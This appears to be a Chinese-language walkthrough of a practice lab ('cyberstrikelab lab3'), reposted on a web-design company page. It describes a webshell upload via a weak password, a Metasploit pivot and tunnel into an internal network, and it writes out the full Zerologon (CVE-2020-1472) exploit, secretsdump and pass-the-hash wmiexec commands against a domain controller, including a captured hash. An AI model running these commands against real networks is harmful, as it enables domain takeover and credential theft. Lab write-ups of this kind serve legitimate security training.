☰
cyberstrikelab lab3教程
2026/10/4 17:53:56 网站建设 项目流程

使用fscan扫描192.168.10.10,发现3590端口开放web服务

存在弱口令admin/tao

新建文件并编辑,写入木马,并用蚁剑连接

上线msf

使用ipconfig /all发现是双网卡

配置路由

# 在 MSF 会话中运行 autoroute 后渗透模块,自动根据已获取的会话路由添加通往内网(192.168.20.0/24)的路由,使 MSF 能够访问内网主机 run post/multi/manage/autoroute

上传stowaway打开通道

靶机

攻击机

使用proxifier搭建代理服务器

就搭建好通道并访问192.168.20.20:8055了

我们不知道连接密码,使用awBrouter.py爆破

配置代理并用蚁剑连接

连接成功,上线msf并使用(注意,通道不能关,我是再开一个会话,这一步好像不用,可以在192.168.10.10完成)

使用net time /domain获取域信息

# 利用 Zerologon(CVE-2020-1472)漏洞攻击域控 WIN-7NRTJO59O7N(192.168.20.30),将其机器账户密码置空 python cve-2020-1472-exploit.py WIN-7NRTJO59O7N 192.168.20.30 使用置空后的机器账户哈希从域控导出域内所有用户哈希(-no-pass 表示无需再输入密码) python secretsdump.py "cyberstrikelab.com/WIN-7NRTJO59O7N$@192.168.20.30" -no-pass 使用导出的 administrator 哈希(f349...e2bc)通过 WMI 在域控上执行命令,实现远程控制 python wmiexec.py -hashes :f349636281150c001081894de72b4e2bcyberstrikelab.com/administrator@192.168.20.30

GitHub - dirkjanm/CVE-2020-1472: PoC for Zerologon - all research credits go to Tom Tervoort of Secura · GitHub

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询